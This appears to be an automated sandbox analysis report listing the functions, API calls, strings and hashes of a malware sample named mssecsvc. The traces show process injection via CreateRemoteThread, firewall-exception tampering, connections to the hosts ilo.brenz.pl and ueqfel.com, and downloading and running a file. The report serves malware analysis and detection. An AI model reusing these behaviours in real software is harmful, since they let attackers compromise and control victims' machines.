SetEvent.KERNEL32(00000420,?,00000000), ref: 7FE442D6
Sleep.KERNEL32(00007530,?,00000000), ref: 7FE442F7
ResetEvent.KERNEL32(00000420,?,00000000), ref: 7FE4430A

Strings

ADVAPI32.DLL, xrefs: 7FE43D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 1567941233-1098094878
Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction ID: 0e4750c5ff84578107d1dc44a4ef0d59ba4f1e35034c124ccd42fec35a7c9163
Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
Instruction Fuzzy Hash: 14E1DD71509358BEEB219F20AC0ABEA7BACEF41304F00265DFC4A9E081D6F46F45DB65

Function 7FE4042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 7FE404BE
GetVersion.KERNEL32 ref: 7FE40500
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FE40528
CloseHandle.KERNEL32(?), ref: 7FE405AD

Strings

csrs, xrefs: 7FE4082C
\BaseNamedObjects\tputVt, xrefs: 7FE40709, 7FE4072C, 7FE4073A
\BaseNamedObjects\tputVt, xrefs: 7FE40708

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\tputVt$\BaseNamedObjects\tputVt$csrs
API String ID: 3017432202-3247437241
Opcode ID: b679b0b8245ea0d57c872b265289cd15f126cb15a0ff8aeac0b807b5cb815465
Instruction ID: 9efcd029e5ff9f702e5d24ec4e940baa3aca8c5eca23fca7c65c58fce1734464
Opcode Fuzzy Hash: b679b0b8245ea0d57c872b265289cd15f126cb15a0ff8aeac0b807b5cb815465
Instruction Fuzzy Hash: 26B1AB71506349FFEB229F64E809BEA3BA9EF45714F00112CFA0A9E580C7F49B458B59

Function 7FE405F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(?), ref: 7FE405AD
GetModuleHandleA.KERNEL32(7FE405EC), ref: 7FE405F2
lstrcpyW.KERNEL32(\BaseNamedObjects\tputVt,\BaseNamedObjects\tputVt,?,?,?,?), ref: 7FE4070A
lstrcpyW.KERNEL32(\BaseNamedObjects\tputVt,?), ref: 7FE4072D
lstrcatW.KERNEL32(\BaseNamedObjects\tputVt,\tputVt), ref: 7FE4073B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FE4076B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FE40786
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407C9
Process32First.KERNEL32 ref: 7FE407DC
Process32Next.KERNEL32 ref: 7FE407ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE40805
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FE40842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE4085D
CloseHandle.KERNEL32 ref: 7FE4086C

Strings

csrs, xrefs: 7FE4082C
\BaseNamedObjects\tputVt, xrefs: 7FE40709, 7FE4072C, 7FE4073A
\BaseNamedObjects\tputVt, xrefs: 7FE40708

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\tputVt$\BaseNamedObjects\tputVt$csrs
API String ID: 1545766225-3247437241
Opcode ID: a6e4895aee82b9b60a721676d8944f06945676ace3fd8aa3594a78ed4fbb6dc7
Instruction ID: 92e33fe563f4ce631dd87b3f5722c0db0ec9cf3d935b64cf14b3b9bf1e8ed77e
Opcode Fuzzy Hash: a6e4895aee82b9b60a721676d8944f06945676ace3fd8aa3594a78ed4fbb6dc7
Instruction Fuzzy Hash: 0F718B31505205FFEB219E50EC49BBE3BBAEF49715F10102CFA0A9E490C7B59B059B99

Function 7FE44178 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 192networksleepstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE44057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE44066
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE441B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE441BD
GetTickCount.KERNEL32 ref: 7FE441F6
Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE4428B
GetTickCount.KERNEL32 ref: 7FE44294
closesocket.WS2_32(6F6C6902), ref: 7FE442B8
SetEvent.KERNEL32(00000420,?,00000000), ref: 7FE442D6
Sleep.KERNEL32(00007530,?,00000000), ref: 7FE442F7
ResetEvent.KERNEL32(00000420,?,00000000), ref: 7FE4430A

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE44178, 7FE44195, 7FE441DB
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT
API String ID: 883794535-1334317923
Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction ID: c034f442e2d8f513e2b327ea41ce5463e34186132653b9dadba1924edba9b606
Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
Instruction Fuzzy Hash: AF71CF75608398BAEB219F3498187EEBFADEF81314F00260CEC5A9E181C7F46B41D755

Function 7FE433E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE4344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE43469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE43493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE434A0
UnmapViewOfFile.KERNEL32(?), ref: 7FE434B8

Strings

\Device\PhysicalMemory, xrefs: 7FE433E0
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43414

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$\Device\PhysicalMemory
API String ID: 2985292042-3938670448
Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction ID: 7fc34539aa9aeb006e3fd3aa9e627af0260f8b81ce38453cec28ed3fa0a6c215
Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
Instruction Fuzzy Hash: 40817671600208BFEB218F14DC89ABA3BADEF44704F504658FD1A9B295D3B4AF459BA4

Function 7FE43405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE4344A
NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE43469
MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE43493
CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE434A0
UnmapViewOfFile.KERNEL32(?), ref: 7FE434B8

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43414
ysic, xrefs: 7FE43450, 7FE43466

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$ysic
API String ID: 2985292042-2835701104
Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction ID: f43c089fce9089dd7d505f4faf75d8f33636ceb6be771680bc0a2bec27c6fb95
Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
Instruction Fuzzy Hash: D5118B74640609BFEB24CF10DC55FEA367CEF88744F10451CFA1A9A290E7F46F189A28

Function 7FE424AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46stringnativeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\tputVt), ref: 7FE424BA
lstrlenW.KERNEL32(?), ref: 7FE424C1
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 7FE42516

Strings

\BaseNamedObjects\tputVt, xrefs: 7FE424B8

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\tputVt
API String ID: 2597515329-2261315748
Opcode ID: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction ID: b59113b06402ddd1e6da3b59c174d95be42712fc9add0a4248e34075b754a1f5
Opcode Fuzzy Hash: 4ad2ef6d84451204b22f2b8ef4fe8d4bb0979e9a2057be4b14859be0269e809c
Instruction Fuzzy Hash: A70181B0785344BAF7309B29CC4BF5B7929DF81B50F508558F708AE1C4DAB89A0483A9

Function 7FE43F8F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 224
networkthreadlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(7FE43F83), ref: 7FE43F8F
WSAStartup.WS2_32(00000101), ref: 7FE43FCE
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE44057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE44066
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE441B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE441BD
GetTickCount.KERNEL32 ref: 7FE441F6
RtlExitUserThread.NTDLL(00000000), ref: 7FE44322

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE44195, 7FE441DB
D s, xrefs: 7FE4414F
ilo.brenz.pl, xrefs: 7FE44056, 7FE44065

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandle$CountEventExitLibraryLoadStartupTickUserVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT$ilo.brenz.pl
API String ID: 3316401344-1495104694
Opcode ID: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction ID: 258e21987668317533843a9e7f1ff18d854900d0519197baaf77827f0a23c433
Opcode Fuzzy Hash: ee4b1f535ca79d9535994823dd2765b1aa6c936bb005bd660b800cb5032af16f
Instruction Fuzzy Hash: 1391AC75608348BAEB219F349819BEA7BADEF41304F00264CFC5A9E181C3F46F45DB65

Function 7FE43EB5 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 276
networklibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(7FE43EA9), ref: 7FE43EB5

Part of subcall function 7FE43ECC: GetProcAddress.KERNEL32(00000000,7FE43EC0), ref: 7FE43ECD
Part of subcall function 7FE43ECC: GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2
Part of subcall function 7FE43ECC: wsprintfA.USER32 ref: 7FE43EF7
Part of subcall function 7FE43ECC: CreateThread.KERNEL32(00000000,00000000,7FE43691,00000000,00000000), ref: 7FE43F40
Part of subcall function 7FE43ECC: CloseHandle.KERNEL32(?,780B832E), ref: 7FE43F49

CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThreadwsprintf$AddressEventFileLibraryLoadModuleNameProcVersionconnectsocket
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 4150863296-2633921094
Opcode ID: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction ID: 0e8994d83ddfd1691c77ce3bf3b5f199d94e5f32b824b4e6e19193fb5f8cc64f
Opcode Fuzzy Hash: 9f06b138147dde36dface2e64d8b648724a67120387ec8aabe41be75442747ba
Instruction Fuzzy Hash: D1A1FE71509348BFEB219F249C49BEA7BACEF81304F00565DF84A8E181D6F46F05DBA6

Function 7FE43ECC Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 265
threadlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,7FE43EC0), ref: 7FE43ECD
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2
wsprintfA.USER32 ref: 7FE43EF7
CreateThread.KERNEL32(00000000,00000000,7FE43691,00000000,00000000), ref: 7FE43F40
CloseHandle.KERNEL32(?,780B832E), ref: 7FE43F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF

Part of subcall function 7FE43405: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE4344A
Part of subcall function 7FE43405: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE43469
Part of subcall function 7FE43405: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE43493
Part of subcall function 7FE43405: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE434A0
Part of subcall function 7FE43405: UnmapViewOfFile.KERNEL32(?), ref: 7FE434B8

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle$ThreadView$AddressEventInformationModuleNameOpenProcQuerySectionSystemUnmapwsprintf
String ID: 020a00 . . :#73204497e +*$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 541178049-2633921094
Opcode ID: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction ID: 0676d137f508c61ec9ecc8346a0bbca927df192c87e92b4f0c786ccd2b6385cd
Opcode Fuzzy Hash: 3176691832235144c822bda6bdece0b9c65d83022bcced3ec1f9b4779e38ef98
Instruction Fuzzy Hash: E7A1ED71508358BFEB219F249C49BEA7BACEF81304F00565DF84A9E081D6F46F45CBA6

Function 7FE43F60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 215
librarystringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(7FE43F54), ref: 7FE43F60

Part of subcall function 7FE43F8F: LoadLibraryA.KERNEL32(7FE43F83), ref: 7FE43F8F
Part of subcall function 7FE43F8F: WSAStartup.WS2_32(00000101), ref: 7FE43FCE
Part of subcall function 7FE43F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
Part of subcall function 7FE43F8F: CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
Part of subcall function 7FE43F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
Part of subcall function 7FE43F8F: socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
Part of subcall function 7FE43F8F: connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
Part of subcall function 7FE43F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB

lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE44057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE44066
wsprintfA.USER32 ref: 7FE44179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE441B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE46AA2,00000000,00000000), ref: 7FE441BD
GetTickCount.KERNEL32 ref: 7FE441F6

Strings

\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE44195, 7FE441DB
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s$\DEVICE\AFD\ENDPOINT
API String ID: 2996464229-1334317923
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: 4e50c4f88f24425f4bee18bfb6ce842719449d350e033f98fb2c42de0991043e
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction Fuzzy Hash: 0781EE71608398BEEB228F349C19BEA7BADEF41314F04165DE84A8E1C1C2F46B45C766

Function 7FE4388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127
networksleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTime.KERNEL32(7FE47584), ref: 7FE4389F
Sleep.KERNEL32(0000EA60), ref: 7FE43911
InternetGetConnectedState.WININET(?,00000000), ref: 7FE4392A
gethostbyname.WS2_32(0D278125), ref: 7FE4396C
socket.WS2_32(00000002,00000001,00000000), ref: 7FE43981
ioctlsocket.WS2_32(?,8004667E), ref: 7FE4399A
connect.WS2_32(?,?,00000010), ref: 7FE439B3
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FE439C1
closesocket.WS2_32 ref: 7FE43A20

Strings

ueqfel.com, xrefs: 7FE438F1

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
String ID: ueqfel.com
API String ID: 159131500-2992884172
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: eea604ef3eef491c3b4b486964eb23317b1c68c5be79fae7d3127a3215423796
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: 4241B131644348BEEB218E209C49BE9BB6EEF85754F04512DF94ADE1C1D7F5AB40A720

Function 7FE407AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE4144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE4145A
Part of subcall function 7FE4144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE4146A

CloseHandle.KERNEL32(?), ref: 7FE405AD
FreeLibrary.KERNEL32(75670000,?,7FE4079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407B8
CloseHandle.KERNEL32(?,?,7FE4079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407BF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE407C9
Process32First.KERNEL32 ref: 7FE407DC
Process32Next.KERNEL32 ref: 7FE407ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE40805
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FE40842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE4085D
CloseHandle.KERNEL32 ref: 7FE4086C

Strings

csrs, xrefs: 7FE4082C

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: a6d35856a40c53af25f3dd880ced36f98488441f4133b4430f7fa635e460986d
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: AB113030501205BBEB255F21DD49BBF3A6DEF54711F00112CF94B99081C6B49B018AAA

Function 7FE42768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 7FE4278C

Part of subcall function 7FE427A7: GetTempFileNameA.KERNEL32(?,7FE427A3,00000000,?), ref: 7FE427A8
Part of subcall function 7FE427A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE427A3,00000000,?), ref: 7FE427C3
Part of subcall function 7FE427A7: InternetReadFile.WININET(?,?,00000104), ref: 7FE427DD
Part of subcall function 7FE427A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427F3
Part of subcall function 7FE427A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE427A3,00000000,?), ref: 7FE427FF
Part of subcall function 7FE427A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE427A3), ref: 7FE42823
Part of subcall function 7FE427A7: InternetCloseHandle.WININET(?), ref: 7FE42833

InternetCloseHandle.WININET(00000000), ref: 7FE4283A

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
String ID:
API String ID: 1995088466-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: d2f72ca38739e1223d228fa8915e7a2d59a899e2c4950480ab4928b4c105e288
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
